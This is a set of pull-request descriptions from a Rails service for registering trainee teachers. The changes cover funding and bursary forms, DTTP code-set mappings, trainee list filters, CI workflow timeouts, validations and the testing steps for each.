app/webpacker/styles/filter_toggle_button.scss
spec/components/application_record_card/view_spec.rb
spec/support/page_objects/trainees/index.rb

https://trello.com/c/tg7twdHw/1861-m-mobile-styles-on-trainee-list-two-breakpoints
* A bit of organisation of the css classes to allow for 1, 2 and 3 columns on trainees list
* Various breakpoints have been added to match prototype
* Go to trainees page, use developer tools to see different responsive sizes.

[1861] Mobile styles on trainee list

---

spec/support/page_objects/funding/burary.rb

https://github.com/DFE-Digital/register-trainee-teachers/pull/1047 <-- This PR changed how the govuk formbuidler renders submit buttons for forms (`button` instead of `input`) so a few of our tests broke.  
This PR fixes the remaining one.

Update page object element to use correct markup

---

app/components/review_draft/apply_draft/view.html.erb
app/components/review_draft/draft/view.html.erb
app/lib/dttp/code_sets/training_initiatives.rb
app/lib/dttp/mappable.rb
app/lib/dttp/params/placement_assignment.rb
config/settings.yml
config/settings/development.yml
config/settings/review.yml
spec/lib/dttp/params/placement_assignment_spec.rb
spec/services/dttp/contact_update_spec.rb
spec/services/dttp/register_for_trn_spec.rb
spec/support/shared_examples/rendering_the_funding_section.rb

https://trello.com/c/ZUzfjqj2/1990-m-funding-send-required-info-to-dttp-training-initiative
- Adds a mapping between training initiatives and their DTTP entity IDs
- Sending this as part of placement assignment params

[1990] Add mapping for initiatives and send to DTTP

---

db/data/20210625135853_update_trainee_subjects.rb

- https://trello.com/c/hoWiJpQH/1999-fix-the-existing-trainees-subjects-in-prod
- Create a data migration to fix trainees in prod with old subjects based on the spreadsheet by Andrew
Note, we're skipping:
`Design and technology` - Providers will be contacted manually
`Citizenship` - DTTP subject specialism hasn't been created
`Physical education` - DTTP subject specialism hasn't been created
Trainees in prod only have their `course_subject_one` fields set. No trainees have additional subjects to deal with as of this time/date.
- Nothing this is a one time and irreversible data migration

[1999] Fix trainees with old subjects

---

config/sidekiq_cron_schedule.yml

https://trello.com/c/Cq4jTqWL/2087-fix-sidekiq-cron-schedule
`config/sidekiq_cron_schedule.yml` wasn't updated to use the `Dttp` namespace after all the DTTP related jobs were moved into the `dttp/` folder.

[2087] Fix Sidekiq cron schedule

---

app/forms/course_details_form.rb
app/lib/route_data_manager.rb
app/models/progress.rb
spec/factories/trainees.rb
spec/forms/course_details_form_spec.rb
spec/lib/route_data_manager_spec.rb

Funding - handle changing routes/subjects
1. When a route is changed for a draft trainee, set the funding (progress) to in progress, and clear funding related information (bursary and intiative)
2. When the course subject is changed, the bursary information is cleared.
1. For a draft trainee, enter funding and bursary information, and then change the route. Expect that the funding and bursary information is nullified.
2. For a trainee, enter bursary information, and then change the course subject. Expect that the bursary information is nullified.

[2014] Funding handle changing routes subjects

---

.github/workflows/delete-review-app.yml

Delete review app may fail if concurrent deployment takes more than 2 min
Increase to 30 min and fail the workflow immediately if the timeout is reached
See same issue in tt api: https://github.com/DFE-Digital/teacher-training-api/runs/2940976784?check_suite_focus=true

Fix delete review app timeout

---

app/lib/dttp/code_sets/course_subjects.rb

We still have trainees in the system with DT & PE as subjects but these are no longer mapped. We're going to add them to DTTP but in the meantime they're erroring when they update.
Put the mapping back for now to stop this.

[xxx] Temporarily remap missing subjects

---

app/forms/diversities/ethnic_group_form.rb
spec/forms/diversities/ethnic_group_form_spec.rb

https://trello.com/c/xqMUFZy8/2053-bug-when-un-assigning-fields-in-trainees-we-assign-the-empty-fields-strings-instead-of-nil
The ethnic background question is hidden when you select (not provided)
as an ethnic group. So previously, if you selected an ethnic group and
background, but then changed the group to not provided, the result
on the confirmation page would be something like:
`Not provided (Irish traveller)` without giving you a way to clear it.
Set `ethnic_background` and `additional_ethnic_background` to `nil` when `ethnic_group` is not provided

[2053] Clear ethnic background when not selecting group

---

app/forms/concerns/course_form_helpers.rb
app/forms/confirm_publish_course_form.rb
app/forms/course_details_form.rb
spec/forms/confirm_publish_course_form_spec.rb

https://trello.com/c/T2SmfktI/2120-bug-bursary-info-not-clearing-when-you-change-publish-course-subject
The bursary info can change if your course changes. We previously added
this to the course details form, but your course can also change in the
confirm publish course form.
Clear bursary info in publish course subject form, extract common methods into concern

[2120] Clear bursary info when changing publish course

---

.github/workflows/deploy.yml

The pipeline failed after 14min as it was abruptly killed by github
actions while waiting for another deployment to finish.
We now add a 30min timeout to give it enough time.
The poll time is reduced to 20s from default 60s to get out faster.

[2131] Increase timeout on build turnstyle

---

app/models/trainee.rb
config/initializers/bursary_tiers.rb
db/migrate/20210702093832_add_bursary_tier_to_trainees.rb
db/schema.rb
spec/factories/trainees.rb
spec/models/trainee_spec.rb

- https://trello.com/c/6nAStKL7/2141-bursaries-new-bursarytier-field-on-trainee
- Adds `bursary_tier` column on the `trainees` table
- Run migrations, assert new field on the `trainees` table

[2141] Add bursary tier field on trainee

---

.github/workflows/build.yml

Currently the review app deployment is asynchronous from the build workflow,
so it is not visible in the PR checks if the app deployment has failed.
Add an action to wait for the deployment workflow
Fail the PR build check, if the review app deployment fails

Wait for the review app deployment to finish in PR build workflow

---

config/initializers/training_routes.rb
db/data/20210702132811_create_bursaries.rb
db/data_schema.rb

https://trello.com/c/sMdbp3ai/2140-bursaries-create-new-early-years-salaried-bursary
- Adds new EY salaried bursary to our DB seeds
- Adds data migration to add all bursaries in prod
- Updates our seed to use the `AllocationSubjects` constants now defined.
This is related to this ticket: https://trello.com/c/ZOJSkkUx/2139-save-the-early-years-teaching-subject-directly-onto-the-ey-trainees
If anyone has any Early years (salaried) trainees, and this card is merged before the above, then their funding sections for these trainees will be labelled 'Cannot start yet'. This is because there will be a bursary in the DB but the trainee's subject isn't completed.
This shouldn't be a problem at the moment, since in settings: `early_years_salaried: false` and `show_funding: false`

[2140] Add new EY salaried bursary and add to seeds/data migration

---

app/controllers/trainees/subject_specialisms_controller.rb
app/forms/subject_specialism_form.rb
app/services/form_store.rb
app/views/trainees/subject_specialisms/edit.html.erb
config/locales/en.yml
config/routes.rb
spec/controllers/trainees/subject_specialisms_controller_spec.rb
spec/forms/subject_specialism_form_spec.rb

https://trello.com/c/uMJ3U4dm/2102-l-subjects-allow-users-to-choose-un-mappable-subjects-general
Adds subject specialism form and controller, not wired up to the rest of the section yet as the confirm page isn't ready. Will connect this together in https://trello.com/c/ymhhRNpG/2105-l-subjects-refactor-of-current-publish-course-forms-flow

[2102] subject specialism form

---

config/locales/en.yml

- [This trello ticket](https://trello.com/c/ie7kfKtc/2154-general-snagging-trainee-start-date-and-id-content-changes)
- Changed the text from `Date trainee started` to `Trainee's start date`
View the `Trainee start date and ID` section from the trainee details page

[2154] Changed start date text to match prototype

---

app/helpers/funding_helper.rb
app/views/trainees/funding/training_initiatives/edit.html.erb
config/locales/en.yml

https://trello.com/c/PHTLAaqi/2156-funding-snagging-training-initiative-form
- Updates the content in the paragraph preceding the form field
- Alphabetises the training initiatives displayed as radio buttons
- Updated some smart quotes as I was in `en.yml`
Check that the content and order of the training initiatives are correct on `/funding/training-initiative/edit`:

[2156] Training initiative form updates

---

app/views/trn_submissions/show.html.erb
config/routes.rb
spec/features/trainee_actions/submit_for_trn_spec.rb
spec/support/page_objects/trainees/trn_success.rb

-[This trello ticket](https://trello.com/c/WmZdvggX/2157-general-snagging-submitted-for-trn-page)
- TRN submission route changed. You can find it now at `/trainee-registrations/{trainee_slug}`
- Content now says `{trainee name} is registered`
- Go to `/trainee-registrations/{trainee_slug}` to see the content changes.

[2157] TRN Submissions page and route updated

---

app/components/review_draft/apply_draft/view.html.erb
app/components/review_draft/draft/view.html.erb
app/helpers/trainee_helper.rb
spec/views/trainees/review_draft/show.html.erb_spec.rb

https://trello.com/c/XGbZ0khL/2153-general-snagging-review-draft-page
* Changed functionality of helper method so that a draft trainee will simply have "Draft record" as caption and "Add a trainee" as the h1 if unnamed. If named, the name will be the h1 instead. 
* Changed for an apply draft trainee too as it would otherwise become tech debt? 
* Updated view spec 
Add a trainee and check when named and unnamed
If you want to check apply draft trainee you'd need to create apply application and associate with trainee
Though screenshot below

[2153] Review draft page updated

---

spec/controllers/trainees/subject_specialisms_controller_spec.rb
spec/factories/courses.rb
spec/factories/subjects.rb

This flaky spec can be reproduced consistently by enforcing a fully numeric
code in the factory, eg:
```ruby
Faker::Alphanumeric.unique.alphanumeric(number: 4, min_numeric: 4).upcase
```
which will raise a `NonCaseSwappableValueError` error.
This change will ensure that we have at least one alphabet, and prevent
the exception from being raised randomly in the test suite.
Also fixes https://trello.com/c/rr0UvNtL/2182-flaky-test-traineessubjectspecialismscontrollerupdate:
Made failure consistently reproducible via https://github.com/DFE-Digital/register-trainee-teachers/pull/1109/commits/0d612648163a308d4f09dd4b11f6f25d2657ce66, and fixed via https://github.com/DFE-Digital/register-trainee-teachers/pull/1109/commits/fe2efea34c539732f7f2bc8c9c610d156987af1c

[2173] Use min_alpha in ensure alphanumeric course codes

---

app/lib/dttp/code_sets/allocation_subjects.rb

Rearranging the Allocation subject specialisms so that the subject that matches the Allocation subject is first.
- A bit tricky since there are currently a few moving parts.
- Ensure you have imported courses and subjects from the TTAPI
- You'll need to change the edit method on `subject_specialisms_controller.rb` so that it's finding a course with subject specialisms. For example `course = Course.find_by(name: "Biology")`
- Then navigate to `http://localhost:3000/trainees/{{slug}}/subject-specialism/1/edit`
- Check that the specialism matching the subject is the first option.

[2111] Subjects show matching specialism first

---

app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/lead_schools/_results.html.erb
config/locales/en.yml
spec/support/shared_examples/school_form_validations.rb

- [This trello ticket](https://trello.com/c/aQw0KyVw/2159-schools-snagging-nonjs-form)
- Changed the error message if a user does not select any radio button on the Lead and Employing school NonJS form
- Fixed the `_results` partial to use the `legend` and `hint` functionalities in the `govuk_radio_buttons_fieldset` in both Lead and Employing school forms
- Make a trainee on school direct salaried
- Turn off JS and input at least 3 valid chars.
- On the radio button and NonJS page, dont select anything. You will see a custom error message saying `Select an lead/employing school or search again` (lead/employing dependent on which form you are on)

[2159] schools snagging nonjs form

---

.github/workflows/build.yml
.github/workflows/delete-review-app.yml
.github/workflows/deploy.yml
.gitignore
Makefile
terraform/terraform.tf
terraform/variables.tf

Keep Makefile commands and ci workflow scripts consistent.
Update build to tag image with full commit sha.
Use passcode to authenticate with cf when running from non ci environments.
Update ci pipeline to use make commands to deploy the application.

Use make commands in ci workflow

---

app/controllers/trainees/employing_schools_controller.rb
app/controllers/trainees/lead_schools_controller.rb
app/forms/schools/employing_school_form.rb
app/forms/schools/form.rb
app/forms/schools/lead_school_form.rb
app/views/trainees/employing_schools/_results.html.erb
app/views/trainees/lead_schools/_no_results.html.erb
app/views/trainees/lead_schools/_results.html.erb
app/views/trainees/lead_schools/edit.html.erb
config/initializers/publish_subject_mapping.rb
config/locales/en.yml
spec/support/shared_examples/school_form_validations.rb

https://trello.com/c/0B55QgA3/2158-schools-snagging-js-school-form
- When the user submits an empty search form, the field itself should appear with error styling and the link in the error summary should link to the field
- When search results are rendered and the user submits the form without choosing a school, it renders a message prompting the user to select a school or search again.
- If the user chooses to search again and submits an empty form, it's get the error message about missing query
- If the user searches again using one character, it's get the appropriate message about miniumum length and no other error message
- Create a "School direct (salaried)" trainee and visit the schools section
- Play around with the forms and see if you can break it

[2158] Schools snagging JS and Non-JS school form

---

app/components/collapsed_section/style.scss
app/views/trainees/check_details/show.html.erb

- https://trello.com/c/0mOfm8kh/2150-general-snagging-check-details-page
- Fixes spacing on inset text components on `/check-details` to match prototype

[2150] Fix check details inset text spacing

---

lib/tasks/example_data.rake

It's a bit of a faf to get test apply draft trainees working with the integration locally so this PR updates the example data script to seed some apply drafts for easier local dev.
This will make roughly half of the total trainees created for each route an apply draft.
To use one of these in dev you still need to go into the console and do something like: `Trainee.where("apply_application_id is not null and state = 0").sample` then use their slug to `/trainees/{slug}` until we implement the filter to filter these out from the trainee records page.

Add apply drafts to example data script

---

README.md
app/services/apply_api/retrieve_applications.rb
spec/services/apply_api/retrieve_applications_spec.rb

https://trello.com/c/j9axMbki/2207-review-createfromapply-service
- Update `ApplyApi::RetrieveApplications` to send `changed_since` param in ISO8601 format
- Update `README` with instructions to run the Apply application import job against example data
- Add the following to your `development.local.yml`
```yml
apply_api:
base_url: "https://sandbox.apply-for-teacher-training.service.gov.uk/register-api"
auth_token: <key available on request>
```
- Follow the instructions in the `README` and confirm it works.

[2207] Review create from Apply service

---

lib/tasks/example_data.rake

Including `FactoryBot::Syntax::Methods` does not seem to play nicely with rspec.
Removing it to use the long form, `FactoryBot.create(...` as opposed to `create(...` instead.
Run `bundle exec rspec spec/lib/tasks/example_data_spec.rb spec/mailers/welcome_email_mailer_spec.rb --seed 47735`
1. on master, and expect a few failures as factory bot overrides the definition of `.generate`
2. on this branch, and expect the test output to be green.

Remove FactoryBot::Syntax::Methods module from rake task

---

app/components/funding/view.rb
app/controllers/trainees/funding/bursaries_controller.rb
app/controllers/trainees/funding/training_initiatives_controller.rb
app/forms/funding/bursary_form.rb
app/lib/route_data_manager.rb
app/models/trainee.rb
app/services/calculate_bursary.rb
app/views/trainees/funding/bursaries/_non_tiered_bursary_form.html.erb
app/views/trainees/funding/bursaries/_tiered_bursary_form.html.erb
app/views/trainees/funding/bursaries/edit.html.erb
config/locales/en.yml
spec/components/funding/view_spec.rb
spec/factories/trainees.rb
spec/features/form_sections/teacher_training_data/edit_bursary_spec.rb
spec/features/form_sections/teacher_training_data/edit_training_initiative_spec.rb
spec/forms/funding/bursary_form_spec.rb
spec/lib/route_data_manager_spec.rb
spec/models/trainee_spec.rb
spec/services/calculate_bursary_spec.rb
spec/support/page_objects/trainees/funding/bursary.rb

For a trainee on the Early years (postgrad) route, we show them a different bursary choice form, listing the possible tiers available, plus an option for "Not applying for bursary"
Split the bursary section into two forms, one for tiered bursaries, applicable on the EY postgrad route, and the standard bursary form for all other routes where bursaries are applicable.
1. For a draft trainee on the early years (postgrad) route, visit the funding section, and complete the initiative section, and press continue.
2. A tiered bursary form should be now seen, allowing the user to choose between tiers one, two, three, or do not apply
3. Select an option and expect to see the chosen tier in the confirmation page.

[2103] bursaries new tiered bursary form

---

app/lib/dttp/code_sets/routes.rb

Adds the missing entity ids for the school routes so the dttp jobs don't blow up.

Add entity ids for school routes

---

config/settings/qa.yml

https://trello.com/c/uoRKQl1a/2264-funding-switch-on-funding-info-collection-in-qa
Show funding in QA, plus the EY salaried route to check the alternative bursary page content.

[2263] Show funding in QA

---

spec/features/end_to_end/assessment_only_journey_spec.rb
spec/features/end_to_end/early_years_assessment_only_journey_spec.rb
spec/features/end_to_end/early_years_postgrad_journey_spec.rb
spec/features/end_to_end/provider_led_journey_spec.rb
spec/features/end_to_end/school_direct_salaried_journey_spec.rb
spec/features/end_to_end/school_direct_tuition_fee_journey_spec.rb
spec/support/features/funding_details_steps.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/sections/funding_details.rb
spec/support/page_objects/trainees/confirm_funding.rb
spec/support/page_objects/trainees/edit_trainee_funding.rb
spec/support/page_objects/trainees/review_draft.rb

We are switching on the funding feature flags for our existing end to end tests.
- Switch on the funding feature flags for the existing end to end feature tests.
- Make the failing end to end feature tests pass by completing the funding section.
- Run the tests and hopefully watch them pass.

[2049] Activate end to end tests for funding

---

app/controllers/trainees_controller.rb
app/forms/course_details_form.rb
app/lib/dttp/params/placement_assignment.rb
app/lib/route_data_manager.rb
app/models/trainee.rb
spec/features/trainee_actions/creating_a_new_trainee_spec.rb
spec/lib/dttp/params/placement_assignment_spec.rb
spec/lib/route_data_manager_spec.rb
spec/models/trainee_spec.rb

https://trello.com/c/lxXrDheO/2267-save-ey-age-range-directly-onto-trainee
This builds on this PR https://github.com/DFE-Digital/register-trainee-teachers/pull/1096 where we started saving EY trainees' subject directly on the model instead of deducing it when we send to DTTP.
This PR does the same but for age_range.
This is needed to make the filtering on age_range easier (currently in progress https://trello.com/c/lDX2m93K/2180-add-filter-by-course-level-on-traineeindex-view). It also makes the DTTP code simpler.
- Create and update some EY trainees and check in your DB that the age range is set to 0-5.
- Update an EY trainee to be on a non-EY route e.g. Assessment only and check that their age range is cleared.

[2267] Set age range on EY trainees

---

app/components/filters/view.html.erb
app/controllers/trainees_controller.rb
app/models/trainee_filter.rb
app/services/trainees/filter.rb
app/views/trainees/index.html.erb
config/initializers/course_levels.rb
config/locales/en.yml
spec/factories/trainees.rb
spec/features/trainee_actions/filtering_trainees_spec.rb
spec/services/trainees/filter_spec.rb
spec/support/page_objects/trainees/index.rb

https://trello.com/c/lDX2m93K/2180-add-filter-by-course-level-on-traineeindex-view
- Adds a new filter to the trainee list view for 'Course level'
- Adds a mapping so that we can determine which age ranges fall into each of 'Early years', 'Primary' and 'Secondary'
Note: before this PR EY trainees won't have age ranges: https://github.com/DFE-Digital/register-trainee-teachers/pull/1144, so won't come up in the filter.
- Filter some trainees!

[2180] Course level filter

---

app/components/form_components/autocomplete/sort.js
app/webpacker/scripts/autocomplete_sort.spec.js

https://trello.com/c/shC2CPc3/1982-autocompletes-handling-punctuation
Rather than stripping punctuation from both the user's query and the option's name/synonyms, this PR replaces the punctuation with whitespace (except for `'` which we still strip).
This means that things like searching for "ba education" will return a result "ba/education":
**Before**
**After**
Search for some things with/without punctuation and check whether it returns you the expected results.

[1982] Client side autocomplete - handling punctuation

---

app/controllers/trainees/training_details_controller.rb
app/forms/training_details_form.rb
app/views/trainees/start_dates/edit.html.erb
app/views/trainees/training_details/edit.html.erb
config/locales/en.yml
spec/features/form_sections/teacher_training_data/edit_training_details_spec.rb
spec/forms/training_details_form_spec.rb
spec/support/features/training_details_steps.rb
spec/support/page_objects/trainees/training_details.rb
spec/support/shared_examples/rendering_the_funding_section.rb

https://trello.com/c/4eHJSmEg/2181-update-trainee-start-date-question
* When course start date is set, an extra question is asked on training details form, to use the course start date or the enter a start date manually
* Option is not shown if no course start date is set
* Add new trainee, complete course section, go to "Trainee start date and ID" section
* Add new trainee, go to "Trainee start date and ID", you should not get option

[2181] Update trainee start date question

---

app/views/trainees/funding/bursaries/_non_tiered_bursary_form.html.erb
app/views/trainees/funding/bursaries/_tiered_bursary_form.html.erb
config/locales/en.yml

Changing the link and link text for any bursary applying to an early years route (we have two at the moment).
- Add a new trainee on the`Early years (postgrad)`
- Click on the funding section
- Select `Now Teach` and continue
- Check that the correct link and link text appears as per the Trello ticket
- Repeat for a trainee on the `Early years (salaried) route`. 
You may have to add `early_years_salaried: true` locally and run the seeds again.

[2262] Change link and link text for early years bursary

---

app/controllers/trainees/contact_details_controller.rb
app/controllers/trainees/course_details_controller.rb
app/controllers/trainees/degrees_controller.rb
app/controllers/trainees/diversity/disclosures_controller.rb
app/controllers/trainees/personal_details_controller.rb
app/controllers/trainees/training_details_controller.rb
spec/controllers/trainees/personal_details_controller_spec.rb
spec/controllers/trainees/training_details_controller_spec.rb

- [This trello ticket](https://trello.com/c/P706ICz2/2210-s-suppress-confirmation-page-when-editing-apply-draft-sections)
- All form redirects now check if the trainee is from an apply application. 
- If they are, they will use the `last_page_origin_path` instead of redirecting them to the confirm page. 
- Create an apply trainee
- Go to their check-details page (or any section that isnt the confirm page) and try and change their details. On updating the form, you will be redirected to the previous page you were on.

[2210] Suppress confirmation page when editing apply draft sections

---

config/settings/staging.yml

https://trello.com/c/Zl3oYt8W/2279-enable-eyts-routes-in-staging-for-testing
Enables Early years (assessment only) and Early years (postgrad) routes in staging for testing.
🚢

[2279] Enable EY AO and postgrad routes in staging

---

app/models/trainee.rb
db/data/20210719132235_reset_update_sha.rb
spec/models/trainee_spec.rb

We use `Trainee#sha` to determine when we should update DTTP. With the
current implementation any time the `Trainee` model changed e.g. a
schema change, all trainees would trigger updates as we were including
field names and nil fields.
Before we merge ->
If we deploy this as is all trainees will get updated to DTTP as the sha will change. We could update all trainees in a data migration but will need to consider how to avoid stopping updates that should happen. 
Update the `digest` -> `value_digest` method to only hash non-nil values
instead of all field names and values.
Also exclude `#progress` as this serializes to an Object key which
changes every time. We only use this internally anyway and it isn't sent
to DTTP.

[2116] Make `Trainee#sha` less sensitive

---

app/lib/dttp/code_sets/qualification_aims.rb

We have added two new routes... Early years assessment only and early years postgrad. 
Add the ITT qualification aims mapping to enable them to be sent to DTTP.
You could check the GUIDs against the DTTP back office 🤷 
https://dttp-ppad.crm4.dynamics.com.mcas.ms/main.aspx?app=d365default&forceUCI=1&pagetype=entitylist&etn=dfe_ittqualificationaim&viewid=692516a9-7ae2-4c8c-8cd6-a20f8c66fbd6&viewType=1039

[xxx] Add EY(AO) and EY(PG) qualification aims

---

app/components/sections/view.rb
app/controllers/trainees/degrees_controller.rb
app/forms/apply_trainee_data_form.rb
config/locales/en.yml
spec/components/apply_trainee_data/view_spec.rb

https://trello.com/c/L0l8PA38/2213-m-handle-degree-deletion-on-apply-draft-page
* For apply draft trainee with no degrees, `sections` component is rendered with different copy to non apply draft trainee
* Redirects back to trainee data edit page instead of confirmation page if degree added
Create an apply draft trainee with a degree, navigate to review trainee data section and delete a degree

[2213] Handle degree deletion on apply draft page

---

app/controllers/trainees_controller.rb
app/models/trainee.rb
app/models/trainee_filter.rb
app/services/trainees/filter.rb
app/views/trainees/index.html.erb
config/locales/en.yml
config/settings.yml
config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml
spec/features/trainee_actions/filtering_trainees_spec.rb
spec/models/trainee_filter_spec.rb
spec/models/trainee_spec.rb
spec/services/trainees/filter_spec.rb
spec/support/page_objects/trainees/index.rb

- [This trello ticket](https://trello.com/c/unyTXiWR/2212-m-update-filter-toggle-to-be-able-to-filter-on-apply-drafts)
- Added an imported from apply filter
- The imported from apply filter does not show, if there are no trainees imported from apply
- This is feature flagged
- Make sure to have apply draft trainees on your system 
- Go to the trainees index page. Click on the imported from apply checkbox. 
- Select `filter`
- You will only see apply draft trainees
- If you go on an account that has no apply draft trainees, you will not see the filter

[2212] update filter toggle to be able to filter on apply drafts

---

app/lib/dttp/code_sets/routes.rb

We have added early years postgrad and assessment only routes.
Add the mappings to the codeset.
DTTP entries -> https://dttp-ppad.crm4.dynamics.com.mcas.ms/main.aspx?app=d365default&forceUCI=1&pagetype=entitylist&etn=dfe_route&viewid=b564da9c-6717-414b-a679-c6ac2230a222&viewType=1039

[xxx] Add early years to routes codeset

---

app/jobs/dttp/register_for_trn_job.rb
app/jobs/dttp/retrieve_trn_job.rb
app/lib/clockover_dependent.rb
config/settings.yml
spec/jobs/dttp/register_for_trn_job_spec.rb
spec/jobs/dttp/retrieve_trn_job_spec.rb

DTTP does not accept new registrations for this year until after a process called clockover which happens on 1/8/2021. We don't want to submit any trainees until after that otherwise they'll be registered in the wrong year.
Update the `RegisterForTrnJob` (and the related `RetreiveTrnJob`) to requeue themselves to after clockover if they are called before the clockover date.

[2288] Don't send non-ao trainees to DTTP until after clockover

---

app/controllers/trainees_controller.rb
app/helpers/course_details_helper.rb
app/models/trainee.rb
app/services/trainees/filter.rb
db/schema.rb
lib/tasks/example_data.rake
spec/factories/trainees.rb
spec/models/trainee_spec.rb

https://trello.com/c/XYBwAlCO/2273-m-dev-include-allocations-subjects-in-subject-filters
- Increases the scope of `:with_subject` on trainee such that it includes the allocation subject for each of the three possible subjects recorded on a trainee.
- Renames `:with_subject` to `:with_subject_or_allocation_subject` to better reflect the returned trainees
- Check that you can search by allocation subject e.g. search for Modern Languages, and 'French language' etc is returned

[2273] Add ability to search for allocation subject in filter

---

app/components/funding/view.rb
config/locales/en.yml
spec/components/funding/view_spec.rb

https://trello.com/c/3zNJdE4B/2272-funding-snagging-bursary-row-for-non-draft-trainees
Shows a bursary row for all non-draft trainees in the funding.component. If no bursary was available for their route/subject combo, it says "No bursaries available for this course".
Only renders a 'change' link on that row if there was a bursary available.

[2272] Bursary row for non-draft trainees

---

app/forms/trainee_start_date_form.rb
app/forms/training_details_form.rb
app/helpers/training_details_helper.rb
config/locales/en.yml
spec/forms/trainee_start_date_form_spec.rb
spec/forms/training_details_form_spec.rb

- https://trello.com/c/KQ9bKnc1/2274-add-validation-for-programme-date-and-start-date
Prior to this PR you could set the `commencement_date` before the course start date and it'll result in a trainee not being able to receive an award. This PR enforces a validation only if the course information has been filled out (assuming you may edit this section before the course details one).
**Training Details Form**
**Trainee Start Date Form (From record page)**
- Create a new trainee, fill out the course details
- Head to the training details section and enter a date before the course start date

[2274] Handle validation for commence date before course start date

---

app/jobs/apply_api/import_applications_job.rb
app/services/apply_api/import_application.rb
spec/jobs/apply_api/import_applications_job_spec.rb
spec/services/apply_api/import_application_spec.rb

https://trello.com/c/0L9h6P71/2249-s-refactor-applyapiimportapplicationsjob-to-actually-create-the-trainees-too
- Modify `ApplyApi::ImportApplicationsJob` to create trainee record from apply application import
The ticket mentioned renaming the job name (my suggestion), but after noticing the naming of other import jobs, I think it makes sense to leave it as it is so it remains consistent with other files (happy to discuss this further).

[2249] Update ApplyApi::ImportApplicationsJob to create trainees from application data

---

app/jobs/dttp/register_for_trn_job.rb
app/jobs/dttp/retrieve_trn_job.rb
config/settings.yml
spec/jobs/dttp/register_for_trn_job_spec.rb
spec/jobs/dttp/retrieve_trn_job_spec.rb

We are holding back submissions to DTTP until after clockover. This shouldn't include assessment only.
* Allow assessment only and early years assessment only to be processed now.
* Update the clockover date. Clockover will be on the morning of 2/8 so hold back requests until 3/8

[XXX] Allow assessment only before clockover

---

app/components/diversity/view.rb
app/forms/diversity_form.rb

https://trello.com/c/W09QOkKD/2278-unable-to-progress-from-editing-sections-to-reviewing-data
Users currently cannot view the `/check-details` page when an Additional disability is selected. This fixes that bug.
- Create a new trainee
- Go through the 'Diversity' flow and select 'Other' disability
- Enter something in the text box and continue
- Confirm
- Click through to 'Check this record'
- It shouldn't throw an error!

[2278] Fix confirmation component for additional disabilities

---

app/components/sections/view.rb
app/controllers/trainees/apply_trainee_data_controller.rb
app/forms/apply_trainee_data_form.rb
app/forms/trn_submission_form.rb
app/helpers/task_list_helper.rb
app/models/progress.rb
app/views/trainees/check_details/_apply_draft_trainee_check_details.html.erb
app/views/trainees/check_details/_draft_trainee_check_details.html.erb
app/views/trainees/check_details/show.html.erb
config/locales/en.yml
spec/components/apply_trainee_data/view_preview.rb
spec/components/apply_trainee_data/view_spec.rb
spec/features/trainee_actions/submit_for_trn_spec.rb
spec/forms/apply_trainees/apply_trainee_data_form_spec.rb

- [This trello ticket](https://trello.com/c/CP15d6zY/2215-s-check-details-page-needs-to-show-collapsed-version-of-apply-draft-sections)
- Changed the check-details page to be like prototype; the key difference being that 4 forms (personal, contact, diversity, degrees) are coupled into a new higher-order form called Trainee Data
- I changed this form to behave a little more dynamically, and so it now works with the progress/status/fields that are required for a form to have if it wants to work with the ProgressService among other things. 
- The view for check-details/show is now using partials to render seperate pages, one for normal draft trainees and one for apply draft trainees
- Find an Apply Draft Trainee
- Click on the `Check Details` at the bottom of the review draft page
- You will …

[2215] Check details page needs to show collapsed version of apply draft sections

---

app/components/collapsed_section/view.html.erb
app/components/collapsed_section/view.rb
app/components/sections/view.rb
config/locales/en.yml
spec/components/collapsed_section/view_preview.rb
spec/components/collapsed_section/view_spec.rb

Funding inactive section
Funding section should not be clickable unless the course details has been prefilled as it relies on course data to drive the funding options, applicable to provider-led and school direct fee

[2265] Added funding inactive section

---

config/locales/pages/guidance/en.yml

We are updating our guidance page.
- Remove allocations content and replace with trainee start date and id
- Remove placement details content and replace with schools
visit `/guidance` and review the content changes in line with the [Trello ticket](https://trello.com/c/rjMA1GZN/2183-s-content-change-check-what-data-you-need)

[2183] Check what data you need content change

---

app/components/degrees/view.rb
app/forms/degree_form.rb
app/helpers/degrees_helper.rb
app/models/apply_application.rb
app/models/degree.rb
app/models/trainee.rb
app/services/degrees/create_from_apply.rb
app/services/degrees/map_from_apply.rb
app/services/trainees/create_from_apply.rb
db/migrate/20210715074856_add_invalid_data_to_apply_application.rb
db/schema.rb
spec/forms/degree_form_spec.rb
spec/helpers/degree_helper_spec.rb
spec/models/apply_application_spec.rb
spec/models/degree_spec.rb
spec/models/trainee/state_transitions_spec.rb
spec/services/degrees/create_from_apply_spec.rb
spec/services/degrees/map_from_apply_spec.rb
spec/services/trainees/create_from_apply_spec.rb

Add invalid data handling for CreateFromApply service. Based on https://github.com/DFE-Digital/register-trainee-teachers/pull/1147
The invalid_data hash stores the degree slug as well, to make it easier to reference against the saved degree.
```ruby
{ <DEGREE_SLUG> => { "subject"=>"Directing for theatre" } }
```
1. Save the invalid data in a new jsonb column on the ApplyApplication table.
2. Add a new method `DegreeForm#save_and_return_invalid_data!` which plucks out the invalid attributes, and nullifies them, before saving the degree.
3. Move the existing `Degrees::CreateFromApply` class to `Degrees::MapFromApply`, and tweak it slightly so that it doesn't return a degree, but instead only maps the attributes from the apply format to expected register format.
4. Add a new …

[2283]  Add invalid data handling for CreateFromApply service

---

config/settings/production.yml

We have a consistency check to alert us if a record is updated directly in DTTP. Due to a bug in DTTP the records appear to be updated quite regularly when they haven't so these are currently useless and noisy.
Disable them until the bug is fixed.

[xxx] Disable consistency checks

---

app/forms/multi_date_form.rb
app/forms/trainee_start_date_form.rb
app/forms/training_details_form.rb
app/helpers/training_dates_helper.rb
config/locales/en.yml
spec/forms/deferral_form_spec.rb
spec/forms/outcome_date_form_spec.rb
spec/forms/reinstatement_form_spec.rb
spec/forms/withdrawal_form_spec.rb
spec/support/shared_examples/date_not_before_course_start_date.rb

- https://trello.com/c/DImGqgwX/2293-validate-outcome-date-form-is-not-before-the-course-start-date
Play about with a few trainees post trn received status by setting the dates for either (outcome, withdrawal, reinstatement, deferral) to be before the course start date.

[2293] Handle date before course start date validation for other trainee date forms

---

app/services/dttp/contact_update.rb
spec/services/dttp/contact_update_spec.rb

https://trello.com/c/v4CKJpyo/2314-error-in-review-environments-for-contactupdate-when-trainee-doesnt-have-a-lead-school
https://sentry.io/organizations/dfe-bat/issues/2512893263/?project=5552118&query=is%3Aunresolved
